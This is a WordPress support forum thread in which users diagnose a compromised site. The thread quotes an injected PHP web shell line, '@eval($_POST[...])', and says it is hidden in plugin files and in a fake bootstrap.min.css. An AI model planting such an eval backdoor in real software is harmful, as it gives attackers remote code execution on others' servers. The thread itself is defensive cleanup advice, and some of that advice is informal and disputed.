error @eval($_POST[“wp_ajx_request”]);

Hello, sasanam & welcome. Could you please provide a site url? I’m suspecting a possible site compromise, but I’d like the url just to check a few things out before definitively arriving at that conclusion.

https://omcc.ir but its down because all plugin disabled by this virus

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Hi I Had the same problem but I found why happening
The problem is one of your installed pluguins ( may be one not installed direct from www.ads-software.com)

The Virus is inside a hiden PHP file called; bootstrap.min.css Is not really a .css is a php file.
First of all:
make your back up.
then erase the file. bootstrap.min.css you must looking for inside your pluguins folders
and rename the files afected usually this ones:
./wp-admin/includes/class-pclzip.php_bak
./wp-content/plugins/revslider/revslider.php
./wp-content/plugins/title-remover/title-remover.php
etc…
You will se that the firs line is extralong with the hacked line and text: @eval($_POST[“wp_ajx_request”]); many times.
You must erase the first line in each .php file an rename it just : <?php

in the uploads folder you must erase the duplicated files with this size: 122×356 px

You must activate the pluguins again and everything will be in its place.

Salud!

• This reply was modified 6 years, 5 months ago by estudiramis.
• This reply was modified 6 years, 5 months ago by estudiramis.

@estudiramis, that may be YOUR experience, but not necessary the OP’s.